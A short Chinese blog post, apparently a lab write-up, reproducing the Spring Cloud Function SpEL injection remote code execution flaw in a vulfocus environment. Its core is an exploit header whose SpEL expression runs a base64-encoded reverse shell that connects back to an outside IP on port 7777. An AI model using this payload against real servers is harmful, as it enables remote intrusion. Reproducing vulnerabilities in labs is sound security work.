Spring Cloud Function SPEL 远程代码执行

Spring Cloud Function SPEL 远程代码执行,第1张

前言

最近Spring Cloud Function组件爆出0day -- SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。

影响版本
3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
漏洞复现

环境来自vulfocus靶场

1、开启环境

2、利用burp抓包,需要给他一个路径

3、在vps开启监听

 4、修改数据包,将反dshell进行base64编码,并添加一个Content-Type

payload: spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNxxzEyMC43OC4yMzkuMTkxLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}")
Content-Type:application/x-www-form-urlencoded

 

5、发包之后成功收到反dshell

 

 

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/787646.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-05
下一篇 2022-05-05

发表评论

登录后才能评论

评论列表(0条)

保存